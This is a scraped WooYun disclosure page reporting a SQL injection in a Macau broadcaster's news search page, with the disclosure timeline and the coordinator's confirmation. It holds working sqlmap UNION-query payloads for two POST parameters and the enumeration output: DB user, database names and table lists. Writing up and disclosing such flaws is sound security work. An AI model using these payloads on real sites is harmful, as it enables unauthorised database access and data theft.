澳門廣播電視www站点sql注入#2 | wooyun-2016-0169586| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169586

漏洞标题：澳門廣播電視www站点sql注入#2

漏洞作者：路人甲

提交时间：2016-01-13 15:44

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-13：细节已通知厂商并且等待厂商处理中
2016-01-15：厂商已经确认，细节仅向厂商公开
2016-01-25：细节向核心白帽子及相关领域专家公开
2016-02-04：细节向普通白帽子公开
2016-02-14：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

详细说明：

网站

http://**.**.**.**.mo/

这个地方存在post注入

http://**.**.**.**.mo/c_news/radio_news.php



那个是get注入。我的是post注入
<code>POST /c_news/more_radionews.php HTTP/1.1
Host: **.**.**.**.mo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**.mo/c_news/radio_news.php
Content-Length: 14
Cookie: radio_news_280860=read; radio_news_280876=read; _pk_ref.1.4ee4=%5B%22%22%2C%22%22%2C1452662337%2C%22https%3A%2F%2F**.**.**.**%2Fbaidu%3Ftn%3Dmonline_3_dg%26ie%3Dutf-8%26wd%3D%25E6%25BE%25B3%25E9%2596%2580%25E5%25BB%25A3%25E6%2592%25AD%25E9%259B%25BB%25E8%25A6%2596%25E8%2582%25A1%25E4%25BB%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2585%25AC%25E5%258F%25B8%22%5D; _pk_id.1.4ee4=ffa7456dd793ab7b.1452489872.2.1452662352.1452489976.; __utma=258114639.740007358.1452489872.1452489872.1452662338.2; __utmc=258114639; __utmz=258114639.1452489872.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E6%BE%B3%E9%96%80%E5%BB%A3%E6%92%AD%E9%9B%BB%E8%A6%96%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; _pk_ses.1.4ee4=*; __utmb=258114**.**.**.**2662338; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=&search=1

search存在注入

Place: POST
Parameter: search
    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: type=&search=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(0x3a6d6d763a,0x594177734d65624a4e78,0x3a7169753a), NULL, NULL# AND
A'='hcmA
Place: POST
Parameter: type
    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: type=' UNION ALL SELECT CONCAT(0x3a6d6d763a,0x46674f77704c425a
0x3a7169753a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lRIe'='lR
arch=1
---
there were multiple injection points, please select the one to use for foll
 injections:
[0] place: POST, parameter: search, type: Single quoted string (default)
[1] place: POST, parameter: type, type: Single quoted string
[q] Quit
>
[13:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5
[13:20:48] [INFO] fetching current user
current user:    'ctdm@**.**.**.**'

available databases [9]:
[*] ctdm
[*] information_schema
[*] mysql
[*] ptdm
[*] radiopgmwordpress
[*] schedule
[*] system
[*] test
[*] webstat

辣么多表

| wp2_links                                     |
| wp2_ngg_album                                 |
| wp2_ngg_album2gallery_rs                      |
| wp2_ngg_gallery                               |
| wp2_ngg_pictures                              |
| wp2_options                                   |
| wp2_postmeta                                  |
| wp2_posts                                     |
| wp2_role_scope_rs                             |
| wp2_term_relationships                        |
| wp2_term_taxonomy                             |
| wp2_terms                                     |
| wp2_user2group_rs                             |
| wp2_user2role2object_rs                       |
| wp2_usermeta                                  |
| wp2_users                                     |
| wp3_chat_log                                  |
| wp3_chat_message                              |
| wp3_commentmeta                               |
| wp3_comments                                  |
| wp3_dmsguestbook                              |
| wp3_groups_rs                                 |
| wp3_links                                     |
| wp3_ngg_album                                 |
| wp3_ngg_album2gallery_rs                      |
| wp3_ngg_gallery                               |
| wp3_ngg_pictures                              |
| wp3_options                                   |
| wp3_postmeta                                  |
| wp3_posts                                     |
| wp3_role_scope_rs                             |
| wp3_term_relationships                        |
| wp3_term_taxonomy                             |
| wp3_terms                                     |
| wp3_user2group_rs                             |
| wp3_user2role2object_rs                       |
| wp3_usermeta                                  |
| wp3_users                                     |
| wp4_chat_log                                  |
| wp4_chat_message                              |
| wp4_commentmeta                               |
| wp4_comments                                  |
| wp4_dmsguestbook                              |
| wp4_groups_rs                                 |
| wp4_links                                     |
| wp4_ngg_album                                 |
| wp4_ngg_album2gallery_rs                      |
| wp4_ngg_gallery                               |
| wp4_ngg_pictures                              |
| wp4_options                                   |
| wp4_postmeta                                  |
| wp4_posts                                     |
| wp4_role_scope_rs                             |
| wp4_term_relationships                        |
| wp4_term_taxonomy                             |
| wp4_terms                                     |
| wp4_user2group_rs                             |
| wp4_user2role2object_rs                       |
| wp4_usermeta                                  |
| wp4_users                                     |
| wp5_chat_log                                  |
| wp5_chat_message                              |
| wp5_commentmeta                               |
| wp5_comments                                  |
| wp5_dmsguestbook                              |
| wp5_groups_rs                                 |
| wp5_links                                     |
| wp5_ngg_album                                 |
| wp5_ngg_album2gallery_rs                      |
| wp5_ngg_gallery                               |
| wp5_ngg_pictures                              |
| wp5_options                                   |
| wp5_postmeta                                  |
| wp5_posts                                     |
| wp5_role_scope_rs                             |
| wp5_term_relationships                        |
| wp5_term_taxonomy                             |
| wp5_terms                                     |
| wp5_user2group_rs                             |
| wp5_user2role2object_rs                       |
| wp5_usermeta                                  |
| wp5_users                                     |
| wp6_chat_log                                  |
| wp6_chat_message                              |
| wp6_commentmeta                               |
| wp6_comments                                  |
| wp6_dmsguestbook                              |
| wp6_groups_rs                                 |
| wp6_links                                     |
| wp6_ngg_album                                 |
| wp6_ngg_album2gallery_rs                      |
| wp6_ngg_gallery                               |
| wp6_ngg_pictures                              |
| wp6_options                                   |
| wp6_postmeta                                  |
| wp6_posts                                     |
| wp6_role_scope_rs                             |
| wp6_term_relationships                        |
| wp6_term_taxonomy                             |
| wp6_terms                                     |
| wp6_user2group_rs                             |
| wp6_user2role2object_rs                       |
| wp6_usermeta                                  |
| wp6_users                                     |
| wp7_chat_log                                  |
| wp7_chat_message                              |
| wp7_commentmeta                               |
| wp7_comments                                  |
| wp7_dmsguestbook                              |
| wp7_groups_rs                                 |
| wp7_links                                     |
| wp7_ngg_album                                 |
| wp7_ngg_album2gallery_rs                      |
| wp7_ngg_gallery                               |
| wp7_ngg_pictures                              |
| wp7_options                                   |
| wp7_postmeta                                  |
| wp7_posts                                     |
| wp7_role_scope_rs                             |
| wp7_term_relationships                        |
| wp7_term_taxonomy                             |
| wp7_terms                                     |
| wp7_user2group_rs                             |
| wp7_user2role2object_rs                       |
| wp7_usermeta                                  |
| wp7_users                                     |
| wp8_chat_log                                  |
| wp8_chat_message                              |
| wp8_commentmeta                               |
| wp8_comments                                  |
| wp8_dmsguestbook                              |
| wp8_groups_rs                                 |
| wp8_links                                     |
| wp8_ngg_album                                 |
| wp8_ngg_album2gallery_rs                      |
| wp8_ngg_gallery                               |
| wp8_ngg_pictures                              |
| wp8_options                                   |
| wp8_postmeta                                  |
| wp8_posts                                     |
| wp8_role_scope_rs                             |
| wp8_term_relationships                        |
| wp8_term_taxonomy                             |
| wp8_terms                                     |
| wp8_user2group_rs                             |
| wp8_user2role2object_rs                       |
| wp8_usermeta                                  |
| wp8_users                                     |
| wp9_chat_log                                  |
| wp9_chat_message                              |
| wp9_commentmeta                               |
| wp9_comments                                  |
| wp9_dmsguestbook                              |
| wp9_groups_rs                                 |
| wp9_links                                     |
| wp9_ngg_album                                 |
| wp9_ngg_album2gallery_rs                      |
| wp9_ngg_gallery                               |
| wp9_ngg_pictures                              |
| wp9_options                                   |
| wp9_postmeta                                  |
| wp9_posts                                     |
| wp9_role_scope_rs                             |
| wp9_term_relationships                        |
| wp9_term_taxonomy                             |
| wp9_terms                                     |
| wp9_user2group_rs                             |
| wp9_user2role2object_rs                       |
| wp9_usermeta                                  |
| wp9_users                                     |
| wp_commentmeta                                |
| wp_comments                                   |
| wp_links                                      |
| wp_options                                    |
| wp_postmeta                                   |
| wp_posts                                      |
| wp_term_relationships                         |
| wp_term_taxonomy                              |
| wp_terms                                      |
| wp_usermeta                                   |
| wp_users                                      |
| wpeveningconcerts_commentmeta                 |
| wpeveningconcerts_comments                    |
| wpeveningconcerts_dmsguestbook                |
| wpeveningconcerts_links                       |
| wpeveningconcerts_options                     |
| wpeveningconcerts_postmeta                    |
| wpeveningconcerts_posts                       |
| wpeveningconcerts_term_relationships          |
| wpeveningconcerts_term_taxonomy               |
| wpeveningconcerts_terms                       |
| wpeveningconcerts_usermeta                    |
| wpeveningconcerts_users                       |
| wptest_chat_log                               |
| wptest_chat_message                           |
| wptest_commentmeta                            |
| wptest_comments                               |
| wptest_dmsguestbook                           |
| wptest_groups_rs                              |
| wptest_kaltura_widgets                        |
| wptest_links                                  |
| wptest_ngg_album                              |
| wptest_ngg_album2gallery_rs                   |
| wptest_ngg_gallery                            |
| wptest_ngg_pictures                           |
| wptest_options                                |
| wptest_pollsa                                 |
| wptest_pollsip                                |
| wptest_pollsq                                 |
| wptest_postmeta                               |
| wptest_posts                                  |
| wptest_role_scope_rs                          |
| wptest_term_relationships                     |
| wptest_term_taxonomy                          |
| wptest_terms                                  |
| wptest_user2group_rs                          |
| wptest_user2role2object_rs                    |
| wptest_usermeta                               |
| wptest_users                                  |
| wptesting_commentmeta                         |
| wptesting_comments                            |
| wptesting_links                               |
| wptesting_options                             |
| wptesting_postmeta                            |
| wptesting_posts                               |
| wptesting_term_relationships                  |
| wptesting_term_taxonomy                       |
| wptesting_terms                               |
| wptesting_usermeta                            |
| wptesting_users                               |
+-----------------------------------------------+
Database: mysql
[24 tables]
+-----------------------------------------------+
| columns_priv                                  |
| db                                            |
| event                                         |
| func                                          |
| general_log                                   |
| help_category                                 |
| help_keyword                                  |
| help_relation                                 |
| help_topic                                    |
| host                                          |
| ndb_binlog_index                              |
| plugin                                        |
| proc                                          |
| procs_priv                                    |
| servers                                       |
| slow_log                                      |
| tables_priv                                   |
| time_zone                                     |
| time_zone_leap_second                         |
| time_zone_name                                |
| time_zone_transition                          |
| time_zone_transition_type                     |
| user                                          |
| user_info                                     |
+-----------------------------------------------+
Database: information_schema
[28 tables]
+-----------------------------------------------+
| CHARACTER_SETS                                |
| COLLATIONS                                    |
| COLLATION_CHARACTER_SET_APPLICABILITY         |
| COLUMNS                                       |
| COLUMN_PRIVILEGES                             |
| ENGINES                                       |
| EVENTS                                        |
| FILES                                         |
| GLOBAL_STATUS                                 |
| GLOBAL_VARIABLES                              |
| KEY_COLUMN_USAGE                              |
| PARTITIONS                                    |
| PLUGINS                                       |
| PROCESSLIST                                   |
| PROFILING                                     |
| REFERENTIAL_CONSTRAINTS                       |
| ROUTINES                                      |
| SCHEMATA                                      |
| SCHEMA_PRIVILEGES                             |
| SESSION_STATUS                                |
| SESSION_VARIABLES                             |
| STATISTICS                                    |
| TABLES                                        |
| TABLE_CONSTRAINTS                             |
| TABLE_PRIVILEGES                              |
| TRIGGERS                                      |
| USER_PRIVILEGES                               |
| VIEWS                                         |
+-----------------------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-01-15 18:13

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向MOCERT通报,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169586

漏洞标题：澳門廣播電視www站点sql注入#2

相关厂商：澳門廣播電視股份有限公司

漏洞作者：路人甲

提交时间：2016-01-13 15:44

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169586

漏洞标题：澳門廣播電視www站点sql注入#2

相关厂商：澳門廣播電視股份有限公司

漏洞作者： 路人甲

提交时间：2016-01-13 15:44

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0169586"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云